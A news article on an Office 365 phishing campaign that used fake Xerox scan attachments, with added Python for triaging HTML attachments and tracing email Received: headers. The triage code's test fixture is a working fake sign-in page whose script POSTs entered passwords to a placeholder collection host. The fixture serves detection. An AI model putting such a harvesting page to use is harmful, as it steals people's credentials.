
Microsoft Office 365 employee passwords leaked online!

A new large-scale phishing campaign targeting organizations worldwide has been found to slip past Microsoft Office 365 Advanced Threat Protection (ATP) and steal the credentials of more than a thousand corporate employees.

The attack is said to have begun in August last year and targeted energy and construction companies, Check Point Research said today in a joint analysis with the industrial security company Otorio.

Microsoft Office 365 phishing credentials

Although credential-stealing phishing campaigns are among the most common causes of data breaches, what makes this one stand out is an operational mistake that led the attackers to inadvertently expose the credentials they had stolen on the public Internet.

"With a simple Google search, anyone could find the password of a compromised email," the researchers said.

The attack started with phishing emails posing as Xerox (or "Xeros") scan notifications and carrying an HTML attachment which, when opened, prompted the recipient to enter their Office 365 password on a fake login page. The passwords were then extracted and sent to a remote server, where they were stored in a plain text file.

The researchers noted that the JavaScript code used to exfiltrate the credentials was continuously tweaked and refined until it evaded most antivirus engines and presented a "realistic" enough experience for victims to hand over their login details.
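An HTML attachment of the kind described in the two paragraphs above can be triaged statically before anyone opens it: a scan notification has no reason to contain a password field, and a script that ships form data to a host outside the expected Microsoft sign-in domains is a harvesting page, however polished it looks. The Python below is an added example and is not code from the Check Point or Otorio analysis. The two attachments are constructed samples, the collection URL is a placeholder on a documentation domain, and the trusted sign-in host list is an assumption for illustration.

```python
"""Static triage of an HTML e-mail attachment for credential-harvesting traits.

Added illustration; not code from the Check Point / Otorio analysis.
The two attachments below are constructed samples. The collection URL is a
placeholder (documentation domain), not an indicator from the campaign.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a genuine Office 365 sign-in is expected to talk to. This list is an
# assumption for the example; a real deployment adds its own SSO/ADFS hosts.
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)


class AttachmentScanner(HTMLParser):
    """Collects password inputs, <form action> targets and URLs inside <script>."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.script_urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # <script> bodies arrive here as raw text; pull every absolute URL out.
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))


def untrusted_hosts(urls):
    """Hostnames in `urls` that are not on the trusted sign-in list (lower-cased)."""
    hosts = set()
    for u in urls:
        host = urlparse(u).hostname
        if host and host.lower() not in TRUSTED_LOGIN_HOSTS:
            hosts.add(host.lower())
    return hosts


def triage_attachment(html):
    """Return a list of findings; an empty list means no harvesting traits seen."""
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    findings = []
    if p.password_inputs == 0:
        return findings  # a scan notice has no reason to ask for a password
    findings.append(f"{p.password_inputs} password field(s) embedded in the attachment")
    exfil = untrusted_hosts(p.form_actions + p.script_urls)
    if exfil:
        findings.append("credentials sent to untrusted host(s): " + ", ".join(sorted(exfil)))
    if not p.form_actions and p.script_urls:
        findings.append("form has no action attribute; submission is handled by script")
    return findings


# Constructed sample: styled as a scan notice, but it is a harvesting page.
HARVESTER_SAMPLE = """<html><body>
<h2>Xerox Scan - document ready</h2>
<form id="f"><input type="email" name="u"><input type="password" name="p">
<button>Sign in to view</button></form>
<script>
document.getElementById("f").onsubmit = function (e) {
  e.preventDefault();
  fetch("https://compromised-blog.example/wp-content/uploads/collect.php",
        {method: "POST", body: new URLSearchParams(new FormData(e.target))});
};
</script></body></html>"""

# Constructed sample: a benign notice with a link and no credential prompt.
BENIGN_SAMPLE = """<html><body><p>Your scanned document is ready.</p>
<a href="https://intranet.corp.example/scans/4711">Open scan</a></body></html>"""

if __name__ == "__main__":
    for name, doc in (("harvester", HARVESTER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, triage_attachment(doc) or ["clean"])
```

Run against the harvester sample, the triage reports the embedded password field, the untrusted destination host and the fact that the form is submitted by script rather than a form action; the benign notice yields nothing. The heuristics are deliberately independent of the JavaScript's wording, so the constant tweaking the researchers describe does not help the attacker: whatever the code looks like, it still has to name a host to send the password to.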

To this end, the campaign relied on a combination of dedicated infrastructure and compromised WordPress servers that the attackers used to store the credentials.

Because the stolen credentials were written to plain text files on these servers, search engines such as Google could index those pages and make them accessible to anyone looking for stolen passwords with a simple search.

In addition, by analyzing the headers of the different emails used in this campaign, the researchers concluded that the messages were sent from a Linux server hosted on Microsoft's Azure platform.
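The header analysis mentioned above comes down to walking the Received: chain from the newest entry (written by the recipient's own mail server) down to the first hop that is not one of the recipient's relays; everything below that hop was supplied by the sender and may be forged. The Python below is an added example, not part of the Check Point or Otorio write-up. The message is constructed, the host names are placeholders, the IP addresses come from the RFC 5737 documentation ranges, and the provider range table is a stand-in for a cloud provider's published IP list (Microsoft publishes its Azure ranges as a downloadable JSON file).

```python
"""Walk the Received: chain of a suspected phishing message to find the host
that handed it to our mail boundary.

Added example; not part of the Check Point / Otorio write-up. The message is
constructed: host names are placeholders and the addresses come from the
RFC 5737 documentation ranges, not from the campaign.
"""
import email
import ipaddress
import re

# "from <helo> (<reverse-dns> [<ip>])" as most MTAs write it. The HELO name is
# whatever the connecting host claimed; only the bracketed IP was observed.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>[^\s(]+)\s*"
    r"(?:\((?P<rdns>[^\s\[\]()]+)?\s*\[(?P<ip>[0-9a-fA-F.:]+)\]\))?",
    re.IGNORECASE,
)


def parse_received(value):
    """One Received: value -> (helo, rdns_or_None, ip_or_None), or None if unparseable."""
    value = " ".join(value.split())  # unfold continuation lines
    m = RECEIVED_RE.search(value)
    if not m:
        return None
    return m.group("helo"), m.group("rdns"), m.group("ip")


def originating_hop(raw_message, internal_nets):
    """First hop outside our own relays, walking from the newest header down.

    Received: headers are prepended, so header order is newest-first. Only
    headers written by our own servers are trustworthy; anything below the
    first external hop could have been forged by the sender.
    """
    msg = email.message_from_string(raw_message)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    for idx, hop in enumerate(hops):
        if hop is None or hop[2] is None:
            continue  # our own relays always record a bracketed IP (assumption)
        addr = ipaddress.ip_address(hop[2])
        if any(addr in n for n in nets):
            continue  # internal relay; keep walking toward the sender
        helo, rdns, ip = hop
        return {
            "helo": helo,
            "rdns": rdns,
            "ip": ip,
            "helo_matches_rdns": rdns is not None and helo.lower() == rdns.lower(),
            "untrusted_headers_below": len(hops) - idx - 1,
        }
    return None


def classify_ip(ip, provider_nets):
    """Name of the provider whose ranges contain `ip`, else 'unknown'."""
    addr = ipaddress.ip_address(ip)
    for name, cidrs in provider_nets.items():
        if any(addr in ipaddress.ip_network(c) for c in cidrs):
            return name
    return "unknown"


# Constructed message. Our boundary MX is mx1.corp.example; 10.0.0.0/8 is ours.
SAMPLE_MESSAGE = """\
Received: from mx1.corp.example (mx1.corp.example [10.0.0.5])
\tby mailbox.corp.example with ESMTP id a1b2c3
Received: from scanner-alerts.example (vm-203-0-113-7.cloud.example [203.0.113.7])
\tby mx1.corp.example with ESMTPS id d4e5f6
Received: from xerox-scanner.local (unknown [192.0.2.9])
\tby scanner-alerts.example with SMTP id g7h8i9
From: "Scan Alert" <scan@scanner-alerts.example>
To: someone@corp.example
Subject: Xerox scan ready

Your document is attached.
"""

# Placeholder range table standing in for a provider's published IP feed.
PROVIDER_NETS = {"example-cloud": ["203.0.113.0/24"]}

if __name__ == "__main__":
    hop = originating_hop(SAMPLE_MESSAGE, ["10.0.0.0/8"])
    print(hop, classify_ip(hop["ip"], PROVIDER_NETS))
```

On the sample the external peer is 203.0.113.7, which claimed the HELO name scanner-alerts.example while its reverse DNS is a generic cloud VM name: a mismatch worth noting, though not proof of anything on its own. The Received: line beneath it, with its internal-looking "xerox-scanner.local", was written by the sender's own server and is not evidence. Mapping the peer address to a provider is a lookup against that provider's published ranges; identifying the operating system, as the researchers did, needs other header fields and is outside this example.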

To mitigate these threats, users are advised to be wary of emails from unknown senders, not to click on suspicious links, and not to open unexpected HTML attachments.

Teo Ehc